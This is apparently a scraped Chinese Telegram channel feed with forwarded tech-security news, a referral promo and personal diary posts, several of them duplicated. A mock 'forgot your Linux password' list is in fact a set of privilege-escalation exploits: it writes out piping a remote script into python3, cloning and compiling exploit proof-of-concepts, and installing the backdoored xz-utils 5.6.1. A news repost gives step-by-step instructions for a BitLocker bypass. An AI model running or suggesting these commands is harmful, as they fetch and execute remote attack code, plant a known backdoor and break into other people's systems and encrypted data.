Forwarded from kMBRjund/0 🧊 (rpool/MBR)
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp | python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
curl https://copy.fail/exp | python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
#羊毛 前 1,000 名注册用户将获得 1,000 美元的额外推理积分 + 对前沿模型(包括 Opus 4.6,最高每月 15,000 美元)的 2.5 倍成本补贴,为期一年。
https://hyperagent.com/refer/4RUQMS3X (需要信用卡验证)
https://hyperagent.com/refer/4RUQMS3X (需要信用卡验证)
Forwarded from Yummy 😋
安全研究员公开BitLocker零日漏洞,可以直接绕过加密机制访问文件
研究人员公开披露 Microsoft BitLocker 加密系统的低级安全漏洞,仅需 1 个 U 盘并物理接触设备即可访问未解锁的 BitLocker 加密分区任何文件。
研究人员Chaotic Eclipse暗示,此前已经向微软报告漏洞但被忽视,所以现在直接公开漏洞及利用方式敦促微软尽快修复漏洞。
利用该漏洞的准备工作 (仅供学习研究使用):
实际操作步骤:
🗒 标签: #微软 #BitLocker #安全漏洞
📢 频道: @GodlyNews1
🤖 投稿: @GodlyNewsBot
研究人员公开披露 Microsoft BitLocker 加密系统的低级安全漏洞,仅需 1 个 U 盘并物理接触设备即可访问未解锁的 BitLocker 加密分区任何文件。
研究人员Chaotic Eclipse暗示,此前已经向微软报告漏洞但被忽视,所以现在直接公开漏洞及利用方式敦促微软尽快修复漏洞。
利用该漏洞的准备工作 (仅供学习研究使用):
• 准备工作:准备 1 个 NTFS/FAT32/exFAT 格式的 U 盘,下载开发者提供的 FsTx 文件夹
• 准备工作:将 FsTx 文件夹复制到 U 盘根目录下的 System Volume Information 目录中 (该目录默认隐藏)
• 替代方式:更隐蔽的方式是将 FsTx 文件夹复制到目标设备的 EFI 分区,不需要外接 U 盘,但这需要提前解锁设备 (不需要解锁分区)
• 下载地址:https://github.com/Nightmare-Eclipse/YellowKey
• 适用平台:Windows 11、Windows Server 2022/2025 (Windows 10 不受此漏洞影响)
实际操作步骤:
• 1. 将处理好的 U 盘连接到目标 Windows 11 系统 (已启用 Microsoft BitLocker 加密)
• 2. 按住 Shift 键并点击重启按钮进入 WinRE 恢复环境
• 3. 点击重启按钮后立即松开 Shift 键并持续按住 Ctrl 键不松手
• 4. 成功后系统会直接弹出没有任何限制的 shell 窗口,在这里可以访问受 BitLocker 保护的卷或其他任意文件
Please open Telegram to view this post
VIEW IN TELEGRAM
#日常 有时觉得自己占有欲还挺强的,下午跟人出门,然后看到有人停在我平时停的那个单车位上,其实我们学校是没有什么固定停车位的,主要也是我一直停那里停了差不多快两年了,习惯了,起了点冲突
就其实明知自己的问题,但是上头了就要 gank 对面
后面下楼给车加气,把人车挪走了,我停那里去了
对面是个大四老登,讲起话来还挺冲的,他托认识的人转达的(微信聊天记录),他第一反应当然是自己确实有问题,我动车了,我认,但是后面反过来开始觉得对面太冲了,嗯,就挺矛盾的
不懂了,平时我还是挺平和的,但是有时候嘛就(~_~💧)
那我还真的算是平和的人吗……
就其实明知自己的问题,但是上头了就要 gank 对面
后面下楼给车加气,把人车挪走了,我停那里去了
对面是个大四老登,讲起话来还挺冲的,他托认识的人转达的(微信聊天记录),他第一反应当然是自己确实有问题,我动车了,我认,但是后面反过来开始觉得对面太冲了,嗯,就挺矛盾的
不懂了,平时我还是挺平和的,但是有时候嘛就(~_~💧)
那我还真的算是平和的人吗……
🥴1
#日常 就算在这行也会中招(叹气
探姬的 X 被盗了,原因嘛,在图里,找软件的时候还是小心点好
原用户名被自己人先占了,后期进行归还,只不过账号回不回得来还是未知数
(我以前也又被盗的情况,说多了都是泪啊😭)
探姬的 X 被盗了,原因嘛,在图里,找软件的时候还是小心点好
原用户名被自己人先占了,后期进行归还,只不过账号回不回得来还是未知数
Forwarded from 赛博安全威胁情报🥸
GitHub被黑,3800 个私有仓库泄露
黑客偷走了 3800 个核心内部仓库,github 官方确定了这事件,并指出员工设备被攻破导致,该事件涉及一个被污染的 VS Code 扩展
里面有Copilot的源码,CodeQL的算法,还有Actions运行时和整个计费系统。
https://x.com/github/status/2056949168208552080
#威胁情报 #吃瓜
黑客偷走了 3800 个核心内部仓库,github 官方确定了这事件,并指出员工设备被攻破导致,该事件涉及一个被污染的 VS Code 扩展
里面有Copilot的源码,CodeQL的算法,还有Actions运行时和整个计费系统。
https://x.com/github/status/2056949168208552080
#威胁情报 #吃瓜
Forwarded from 科技圈🎗在花频道📮
DeepSeek-V4-Pro 模型 API 目前的 2.5 折优惠活动将于 2026 年 5 月 31 日结束。结束后,其正式定价将调整为原价的四分之一,与当前的优惠价格保持一致。
DeepSeek API Doc
🌸 在花频道 · 备用频道 · 投稿通道
Please open Telegram to view this post
VIEW IN TELEGRAM